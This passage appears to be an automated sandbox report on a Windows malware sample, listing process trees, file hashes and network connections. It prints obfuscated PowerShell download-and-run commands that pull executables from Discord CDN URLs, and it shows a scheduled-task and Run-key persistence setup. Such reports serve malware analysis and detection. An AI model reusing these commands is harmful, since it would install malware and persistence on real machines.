PID 2040 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 2672 wrote to memory of 2060 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\HRtZImoued.exe
PID 2672 wrote to memory of 2060 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\HRtZImoued.exe
PID 2672 wrote to memory of 2060 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\HRtZImoued.exe
PID 2060 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\HRtZImoued.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2060 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\HRtZImoued.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2060 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\HRtZImoued.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2040 wrote to memory of 1524 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 2040 wrote to memory of 1524 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 2040 wrote to memory of 1524 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 1524 wrote to memory of 1908 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\MGSumxcpSx.exe
PID 1524 wrote to memory of 1908 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\MGSumxcpSx.exe
PID 1524 wrote to memory of 1908 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\MGSumxcpSx.exe
PID 1908 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\MGSumxcpSx.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1908 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\MGSumxcpSx.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1908 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\MGSumxcpSx.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2040 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 2040 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 2040 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe C:\Windows\system32\cmd.exe
PID 1828 wrote to memory of 1284 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\kPxex847I7.exe
PID 1828 wrote to memory of 1284 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\kPxex847I7.exe
PID 1828 wrote to memory of 1284 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\kPxex847I7.exe
PID 1828 wrote to memory of 1284 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\kPxex847I7.exe
PID 1284 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\kPxex847I7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1284 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\kPxex847I7.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe

"C:\Users\Admin\AppData\Local\Temp\eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe"

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\Flj5kLU8wz.sln

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\Flj5kLU8wz.sln

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Flj5kLU8wz.sln"

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\ngqOLMUHlZ.exe

C:\Users\Admin\AppData\Local\Temp\ngqOLMUHlZ.exe

C:\Users\Admin\AppData\Local\Temp\ngqOLMUHlZ.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAagBxACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAxADgANwA4ADYANwAwADQANAA0ADYANQA2ADEAOQAxADEANgAvADEAMQA4ADcAOAA2ADcANAAxADYAMwAxADUAOAAzADQANQA2ADgALwAyADIAZAAuAGUAeABlACcALAAgADwAIwBsAGYAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAYwBuACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGQAcgBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEASABEAFUARQBaAC4AZQB4AGUAJwApACkAPAAjAGoAbgBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAZABqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBoAGwAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxAEgARABVAEUAWgAuAGUAeABlACcAKQA8ACMAbgB1AGoAIwA+AA=="

C:\Users\Admin\AppData\Local\Temp\j8KsnCTMHC.exe

C:\Users\Admin\AppData\Local\Temp\j8KsnCTMHC.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAcAB0ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADEAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEAOAA3ADgANgA3ADAANAA0ADQANgA1ADYAMQA5ADEAMQA2AC8AMQAxADgANwA4ADYANwA0ADUANAA4ADMAMgAxADEANQA3ADcAMwAvAGQAbwBsAGwAbQBjAGMAcABpAGwALgBlAHgAZQAnACwAIAA8ACMAcgBhAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB1AGcAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBsAHUAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAyAEgARABVAEUAWgAuAGUAeABlACcAKQApADwAIwByAGcAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBzAGQAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAawBoAHEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMgBIAEQAVQBFAFoALgBlAHgAZQAnACkAPAAjAGoAcgBjACMAPgA="

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\j8KsnCTMHC.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAeQBlACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADEAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEAOAA3ADgANgA3ADAANAA0ADQANgA1ADYAMQA5ADEAMQA2AC8AMQAxADgANwA4ADYANwA0ADUAOQAwADYAOAAzADYANgA4ADUAOAAvAEgAeQB2AC4AZQB4AGUAJwAsACAAPAAjAGQAZQB2ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcABnAGsAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagB1AGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMwBIAEQAVQBFAFoALgBlAHgAZQAnACkAKQA8ACMAYQBjAGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcQBqAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHYAdgB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADMASABEAFUARQBaAC4AZQB4AGUAJwApADwAIwBuAGIAdgAjAD4A"

C:\Users\Admin\AppData\Local\Temp\rJ8Nd8RdAx.exe

C:\Users\Admin\AppData\Local\Temp\rJ8Nd8RdAx.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\rJ8Nd8RdAx.exe

C:\Users\Admin\AppData\Local\Temp\HRtZImoued.exe

C:\Users\Admin\AppData\Local\Temp\HRtZImoued.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAagBpACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADEAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEAOAA3ADgANgA3ADAANAA0ADQANgA1ADYAMQA5ADEAMQA2AC8AMQAxADgANwA4ADYANwA0ADgAMAAwADgAMQA4ADMAOAAxADgAMQAvAGUAYgBjAHoAZAAuAGUAeABlACcALAAgADwAIwBzAGgAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGQAagBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHUAaABsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADQASABEAFUARQBaAC4AZQB4AGUAJwApACkAPAAjAHYAbgBxACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHMAYwBlACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHcAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA0AEgARABVAEUAWgAuAGUAeABlACcAKQA8ACMAdQBhAG0AIwA+AA=="

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\HRtZImoued.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAZABjACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADEAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEAOAA3ADgANgA3ADAANAA0ADQANgA1ADYAMQA5ADEAMQA2AC8AMQAxADgANwA4ADYANwA1ADAAMAAzADQAOAA3ADAAMgA4ADEAMgAvAEcAMwA2AGQAaAAxAC4AZQB4AGUAJwAsACAAPAAjAHEAZgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABtAGwAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaQBzAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANQBIAEQAVQBFAFoALgBlAHgAZQAnACkAKQA8ACMAZgBjAGQAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcAB2AGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAaQBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADUASABEAFUARQBaAC4AZQB4AGUAJwApADwAIwBqAGUAZwAjAD4A"

C:\Users\Admin\AppData\Local\Temp\MGSumxcpSx.exe

C:\Users\Admin\AppData\Local\Temp\MGSumxcpSx.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\MGSumxcpSx.exe

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \fds2 /tr "C:\Users\Admin\AppData\Roaming\f32\331.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \fds2 /tr "C:\Users\Admin\AppData\Roaming\f32\331.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\CMWYeIDpgd.exe

C:\Users\Admin\AppData\Local\Temp\CMWYeIDpgd.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAcQB5ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEAOAA3ADgAMAA2ADYANgAzADYAOQA3ADIAMwA2ADAAMAA4AC8AMQAxADgANwA4ADAANgA3ADUANgA0ADAAOAAxADQANwA5ADgAOAAvAG0AdQBjAGsAXwBpAHQAcAAuAGUAeABlAD8AZQB4AD0ANgA1ADkAOAAzAGEAMwBmACYAaQBzAD0ANgA1ADgANQBjADUAMwBmACYAaABtAD0ANwA0ADgAZgA4AGIAZgBiADMAZABmADAAOQBmADYAOQA1ADgAMABkAGEANQA4ADYAMwAyADEANQBhADAAOABhAGIAMgAzAGEAMwA5AGEAMgBmADYANQA2ADMAOQBmAGMAYQA4AGYAMwBkADEAYgA2ADUAYQBiAGEAZABlADkANgAmACcALAAgADwAIwB2AHIAcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGIAagBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAdwBiACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADYANwBXAGkAbgBkAG8AdwBzAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnACkAKQA8ACMAdABnAHIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBrAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAaAByACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADYANwBXAGkAbgBkAG8AdwBzAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnACkAPAAjAHEAbAByACMAPgA="

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\CMWYeIDpgd.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'dfs1';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'dfs1' -Value '"C:\Users\Admin\AppData\Roaming\f32\331.exe"' -PropertyType 'String'

C:\Users\Admin\AppData\Local\Temp\kPxex847I7.exe

C:\Users\Admin\AppData\Local\Temp\kPxex847I7.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\kPxex847I7.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 textbin.net udp
US 148.72.177.212:443 textbin.net tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.205:80 apps.identrust.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 rentry.co udp
FR 164.132.58.105:443 rentry.co tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp

Files

memory/2040-0-0x000000013F130000-0x000000013F294000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Temp\Tar342F.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 053fab938a29191701eaca560b269783
SHA1 28a2824d5548ab48e958afe84b5a179b90c06d67
SHA256 41626d94673e5a9ee05267c2d5f88252ebb6165fcc3176b7a86b0b5e44db9058
SHA512 4e3ac942152bba6eee560a36d4c595cde5a120b59e4190fb643adf11dcfc2d242a6b9973b6622b98d5cbed6443b2fd758028b107282aedff1568a8e20a955a54

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 651ff944c882605eb6bb27cd8503b2f8
SHA1 aaede77f678ea0ef16a67b632717f45a9d530668
SHA256 df5922c887dfca43c39ecf43a2e1f5467fe813a3dcbab13c82c1d6dceb194723
SHA512 8d264670e6f3500f61815a799eb70670d07a0937ba128d18f58665391963c77dbd97a8a67e0bec73490ff170f9ec7e1b3036d49757a53d78ccc9ff7c9bdbfc4a

memory/2040-174-0x000000013F130000-0x000000013F294000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Flj5kLU8wz.sln

MD5 7d447e1ef857ddf5640f2456f2d29e92
SHA1 60131aa77dea336e77892edbf2531c443fbb62e6
SHA256 6a14a1c978a93731c379357248807f069795e1bebb0e0166bccc57a2c5c2559f
SHA512 f02199eea81e1e9c7f3cd1f6c3df9690650b4a43720e1a560099cb15ed6bf8498a2871c8a9130afc30ac58ee6b8c777e2a94c02444b6574555cfdf1129fa8c4d

C:\Users\Admin\AppData\Local\Temp\ngqOLMUHlZ.exe

MD5 805299701ce93e36f34b01f5805c09f5
SHA1 3573f93d3388363e418a4570e6f97270439aeac2
SHA256 d9e4201c44aa17b9a3a1e876ce727cf220ab98b22dc71a8c5002025917fd75db
SHA512 a5140f73f6da312e885587867275fb765bfc56440d1c1fe8c8f7c53797730ecb9c7ba6026f0f0902a9ec6f33d082deb507cafd7b9a0177ab3e5676cb7826031f

memory/992-228-0x0000000001350000-0x0000000001358000-memory.dmp

memory/992-229-0x000007FEF5370000-0x000007FEF5D5C000-memory.dmp

memory/1080-234-0x000000001B640000-0x000000001B922000-memory.dmp

memory/1080-235-0x000007FEF5320000-0x000007FEF5CBD000-memory.dmp

memory/1080-236-0x0000000002770000-0x0000000002778000-memory.dmp

memory/1080-240-0x0000000002BB0000-0x0000000002C30000-memory.dmp

memory/1080-239-0x0000000002BB0000-0x0000000002C30000-memory.dmp

memory/1080-238-0x000007FEF5320000-0x000007FEF5CBD000-memory.dmp

memory/1080-237-0x0000000002BB0000-0x0000000002C30000-memory.dmp

memory/1080-241-0x0000000002BB0000-0x0000000002C30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\j8KsnCTMHC.exe

MD5 90f04a884d482845cd83e43f781334c3
SHA1 8ac1dfce2b7262e532f2f4fe673580508a45fad2
SHA256 a06db6cf89c5d53c71af847a88de21140163cdc45817ed1c0884c8ceabe8b8e7
SHA512 71faed6315b58e892fbf8ce0118bf1da21fbadae02ba6346b7699dc904805b9858c0b331b2ba1ad6ac90c4ad8d5e859806a5fe2759f6308e99badfa728012433

memory/1772-246-0x0000000001240000-0x0000000001248000-memory.dmp

memory/2040-247-0x000000013F130000-0x000000013F294000-memory.dmp

memory/1772-250-0x000007FEED920000-0x000007FEEE30C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 1bcc173a136982b45fc5336d34c47e7d
SHA1 fe9f480e7e961566badd78c7c4176f0da3e66b00
SHA256 b152f50d4ed4ebcf56cfd8b514c7348de6537c40b26db45b6f08d8f520cfdc5d
SHA512 71ee15a00e034682edb637f9e93b52d5529b8f72db72fe0acd0c3387a7d970abc75d09f02a4a88a29f171d688df0d9eba7c9475d1cd924216120f66c66afb1d8

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2036-255-0x000007FEF5320000-0x000007FEF5CBD000-memory.dmp

memory/2036-256-0x0000000002DB0000-0x0000000002E30000-memory.dmp

memory/2036-258-0x0000000002DB0000-0x0000000002E30000-memory.dmp

memory/2036-257-0x000007FEF5320000-0x000007FEF5CBD000-memory.dmp

memory/2036-259-0x0000000002DB0000-0x0000000002E30000-memory.dmp

memory/2036-260-0x0000000002DB0000-0x0000000002E30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\rJ8Nd8RdAx.exe

MD5 91ce0e5d1a87995fc86f6a8cd119a564
SHA1 9e1c741edaa8517140934928dfd22a2b17e77b29
SHA256 14e6fbd1b98b5b4177b5d79b363d538353a5a37a063986fa5364a7554d9a6644
SHA512 78c767a6546fa5f5a02cc9dc35e775c4b49d173a6328f9845abf6da49e0a50e5ad77755f410653b5262b1a3618782fcb10620987fc50984f209f5e926a2f75d9

memory/1472-266-0x000007FEECF30000-0x000007FEED91C000-memory.dmp

memory/1472-265-0x0000000001240000-0x0000000001248000-memory.dmp

memory/2708-272-0x000007FEF5320000-0x000007FEF5CBD000-memory.dmp

memory/2708-273-0x0000000002D60000-0x0000000002DE0000-memory.dmp

memory/2708-276-0x0000000002D60000-0x0000000002DE0000-memory.dmp

memory/2708-275-0x0000000002D60000-0x0000000002DE0000-memory.dmp

memory/2708-274-0x000007FEF5320000-0x000007FEF5CBD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\HRtZImoued.exe

MD5 3a12f3e0a5789b83867c96bc812a4437
SHA1 fe2d7c9234de99ab8ab06dc40ff1228bf7a76737
SHA256 c1232df3595cd2aed4c72c16a4c52c0687c1ab13df937c3251a49a254e3b6141
SHA512 9c506529f8294f542a4f4e033631e7a2e4bd4f455fb16e95884f279fdf99721355405690936d610294d3210ac9f8924c2209a951c47881cc4448df12523dc741

memory/2060-281-0x0000000000DC0000-0x0000000000DC8000-memory.dmp

memory/2060-287-0x000007FEED920000-0x000007FEEE30C000-memory.dmp

memory/992-289-0x000007FEF5370000-0x000007FEF5D5C000-memory.dmp

memory/2060-282-0x000007FEED920000-0x000007FEEE30C000-memory.dmp

memory/1080-291-0x0000000002BB0000-0x0000000002C30000-memory.dmp

memory/1080-290-0x000007FEF5320000-0x000007FEF5CBD000-memory.dmp

memory/2452-293-0x0000000002D60000-0x0000000002DE0000-memory.dmp

memory/2452-292-0x000007FEF5320000-0x000007FEF5CBD000-memory.dmp

memory/2452-295-0x0000000002D60000-0x0000000002DE0000-memory.dmp

memory/2452-294-0x0000000002D60000-0x0000000002DE0000-memory.dmp

memory/1080-296-0x0000000002BB0000-0x0000000002C30000-memory.dmp

memory/1080-297-0x0000000002BB0000-0x0000000002C30000-memory.dmp

memory/1080-298-0x000007FEF5320000-0x000007FEF5CBD000-memory.dmp

memory/1908-303-0x0000000001220000-0x0000000001228000-memory.dmp

